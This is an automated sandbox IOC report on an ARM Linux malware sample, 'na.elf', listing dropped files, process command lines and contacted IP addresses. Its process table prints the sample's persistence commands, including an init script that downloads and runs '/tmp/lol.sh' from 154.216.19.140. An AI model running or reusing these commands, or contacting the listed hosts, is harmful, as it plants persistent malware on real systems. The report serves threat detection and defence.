IOC Report
na.elf

Files

File Path | Type | Category | Malicious
--------- | ---- | -------- | ---------
na.elf | ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped | initial sample | malicious
/etc/init.d/mybinary | POSIX shell script, ASCII text executable | dropped | malicious
/etc/init.d/na.elf | POSIX shell script, ASCII text executable | dropped | malicious
/etc/profile | ASCII text | dropped | malicious
/etc/rc.local | POSIX shell script, ASCII text executable | dropped | malicious
/boot/bootcmd | ASCII text | dropped |
/etc/inittab | ASCII text | dropped |
/etc/motd | ASCII text | dropped |
/etc/systemd/system/custom.service | ASCII text | dropped |
/memfd:snapd-env-generator (deleted) | ASCII text | dropped |
/tmp/qemu-open.d1Mlmt (deleted) | data | dropped |

Processes

Path | Cmdline | Malicious
---- | ------- | ---------
/usr/bin/dash | - |
/usr/bin/rm | rm -f /tmp/tmp.X4LvdcPchc /tmp/tmp.hrDZxt4n4J /tmp/tmp.SKR6rNNjpj |
/usr/bin/dash | - |
/usr/bin/rm | rm -f /tmp/tmp.X4LvdcPchc /tmp/tmp.hrDZxt4n4J /tmp/tmp.SKR6rNNjpj |
/tmp/na.elf | /tmp/na.elf |
/tmp/na.elf | - |
/bin/sh | sh -c "systemctl enable custom.service >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/systemctl | systemctl enable custom.service |
/tmp/na.elf | - |
/bin/sh | sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/chmod | chmod +x /etc/init.d/mybinary |
/tmp/na.elf | - |
/bin/sh | sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/ln | ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary |
/tmp/na.elf | - |
/bin/sh | sh -c "echo \"#!/bin/sh\n# /etc/init.d/na.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting na.elf'\n /tmp/na.elf &\n wget http://154.216.19.140/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping na.elf'\n killall na.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/na.elf" |
/tmp/na.elf | - |
/bin/sh | sh -c "chmod +x /etc/init.d/na.elf >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/chmod | chmod +x /etc/init.d/na.elf |
/tmp/na.elf | - |
/bin/sh | sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/mkdir | mkdir -p /etc/rc.d |
/tmp/na.elf | - |
/bin/sh | sh -c "ln -s /etc/init.d/na.elf /etc/rc.d/S99na.elf >/dev/null 2>&1" |
/bin/sh | - |
/usr/bin/ln | ln -s /etc/init.d/na.elf /etc/rc.d/S99na.elf |
/tmp/na.elf | - |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |
/usr/lib/systemd/systemd | - |
/usr/lib/systemd/system-environment-generators/snapd-env-generator | /usr/lib/systemd/system-environment-generators/snapd-env-generator |
/usr/lib/udisks2/udisksd | - |
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0 |

URLs

Name | IP | Malicious
---- | -- | ---------
http://154.216.19.140/ | unknown |

IPs

IP | Domain | Country | Malicious
-- | ------ | ------- | ---------
154.216.19.139 | unknown | Seychelles |
87.120.84.105 | unknown | Bulgaria |
185.170.144.84 | unknown | unknown |
109.202.202.202 | unknown | Switzerland |
91.189.91.43 | unknown | United Kingdom |
193.143.1.59 | unknown | unknown |
91.189.91.42 | unknown | United Kingdom |

Memdumps
